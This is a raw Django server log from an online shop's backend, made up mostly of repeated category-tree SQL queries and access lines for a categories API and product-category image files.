140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:30:51,643 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:30:51,645 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:30:51,647 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:30:51,650 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:30:51,653 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:30:51,656 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:30:51,658 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:30:51,661 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:30:51,663 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:30:51,667 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:30:51,669 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:30:51,671 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:30:51,674 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:30:51,676 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:30:51,680 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:30:51,682 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:30:51,684 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:30:51,687 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:30:51,689 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:30:51,691 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:30:51,694 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:30:51,697 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:30:51,699 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:30:51,702 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:30:51,705 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:30:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 09:30:52] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 09:30:58] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 09:31:02] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 09:31:04] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:07] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:08] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:10] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:10] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:12] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:15] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 09:31:18] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:19] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:20] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:20] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:21] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:21] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 09:31:21] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:23] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:25] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:26] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:27] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [19/Dec/2019 09:31:27] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 09:31:30] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 09:31:31] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 09:31:32] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 09:31:33] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 09:31:34] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:35] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:36] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:38] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:40] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:40] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 09:31:43] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 09:31:43] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 09:31:44] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 09:31:47] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 09:31:47] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 09:31:49] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 Not Found: /proxyjudge.php [19/Dec/2019 09:32:06] "GET /proxyjudge.php HTTP/1.0" 404 6468 [19/Dec/2019 09:32:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:32:45,508 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:32:45,517 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:32:45,522 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:32:45,525 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:32:45,530 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:32:45,532 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:32:45,535 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:32:45,538 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:32:45,541 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:32:45,546 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:32:45,549 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:32:45,552 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:32:45,555 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:32:45,558 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:32:45,562 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:32:45,565 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:32:45,568 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:32:45,571 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:32:45,574 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:32:45,579 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:32:45,582 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:32:45,585 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:32:45,588 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:32:45,591 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:32:45,594 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:32:45,599 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:32:45,602 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:32:45,605 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:32:45,610 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:32:45,613 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:32:45,618 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", 